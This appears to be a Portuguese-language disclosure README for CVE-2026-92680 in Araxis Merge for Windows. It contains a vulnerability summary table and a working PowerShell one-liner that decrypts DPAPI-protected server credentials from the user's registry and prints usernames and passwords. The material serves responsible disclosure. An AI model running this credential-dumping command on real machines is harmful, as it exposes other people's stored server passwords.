
Proof-of-concept que descriptografa as credenciais de servidor protegidas por DPAPI do Araxis Merge (CVE-2026-92680), demonstrando armazenamento de credenciais insuficientemente protegido no Windows.
O Araxis Merge para Windows armazena credenciais de servidor com DPAPI com pOptionalEntropy definido como NULL. Isso permite que qualquer código em execução no mesmo contexto de usuário as descriptografe.
Writeup completo: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: Credenciais insuficientemente protegidas |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| Fornecedor | Araxis Ltd. |
| Afetado | Araxis Merge para Windows 2011.4074 até 2026.0 |
| Corrigido em | 2026.1 |
| Aviso do fornecedor | Merge-SA-26-00 |
| Reportado | 2026-08-18 |
| Divulgado | 2026-XX-XX |
| Relator | grepStrength |
Isso descriptografará e analisará HKCU\Software\Araxis\Merge\7.1\Passwords. Isso deve ser executado como o mesmo usuário do Windows que originalmente armazenou as credenciais.
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
Todos os testes foram realizados em sistemas de propriedade da grepStength Security usando apenas credenciais sintéticas. Isso foi reportado à Araxis Ltd. e divulgado publicamente após a disponibilização de uma correção.
MIT